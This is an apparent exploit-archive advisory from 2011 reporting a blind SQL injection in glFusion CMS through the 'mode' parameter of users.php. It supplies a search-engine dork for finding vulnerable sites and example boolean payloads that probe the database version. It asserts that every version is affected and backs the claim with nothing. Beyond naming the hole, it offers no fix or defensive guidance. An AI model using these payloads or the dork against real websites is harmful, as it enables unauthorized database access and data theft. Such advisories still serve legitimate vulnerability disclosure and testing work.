glFusion CMS suffers from a remote blind SQL injection vulnerability.
002f00d412b223b8c47ffe2113ec5755cab7b22632218f1804e4baea4e8ae938
= == === ====== == == == ==== === ==== ==== ==== === ==== === ====
[glFusion CMS Blind SQL injection Vulnerability]
= == === ====== == == == ==== === ==== ==== ==== === ==== === ====
#Author:H3X
#Cradit:Sepehr Security Team
#Reference:
#Product:glFusion CMS
#google Dork:"Powered by glFusion CMS"
#Vulnerable Version: all version
#Vulnerability Type:Blind SQL Injection
#Date:start[2011-02-25]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[Vulnerability Details]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#Exploit:
/users.php?mode=[Blind_SQL_injection_here]
#Example:
/users.php?mode=1 and substring(version(),1,1)=4 // false
/users.php?mode=1 and substring(version(),1,1)=5 // true
= == === ====== == == == ==== === ==== ==== ==== === ==== === ====
Greetz:thE_knight & Einstein & Wizard
our site :http://www.sepehr-team.org